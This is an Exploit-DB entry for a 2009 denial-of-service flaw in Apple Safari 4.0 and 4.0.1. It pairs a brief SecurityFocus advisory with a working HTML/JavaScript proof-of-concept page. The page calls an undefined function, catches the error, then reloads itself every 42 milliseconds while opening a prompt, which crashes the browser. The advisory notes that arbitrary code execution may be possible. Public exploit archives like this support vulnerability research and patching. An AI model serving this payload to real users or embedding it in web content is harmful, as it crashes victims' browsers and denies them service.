Apple Safari 4 - 'reload()' Denial of Service

EDB-ID:

33062

Author:

SkyOut

Type:

dos

Platform:

Windows

Published:

2009-06-02

source: http://www.securityfocus.com/bid/35555/info

Apple Safari is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.

Safari 4.0 and 4.0.1 are vulnerable; other versions may also be affected.

<html> <body> <script src="empty.js"></script> <script> try { crashSafari(); } catch(e) { setTimeout("location.reload();",42); prompt('apple culpa? comment:'); } </script> </body> </html>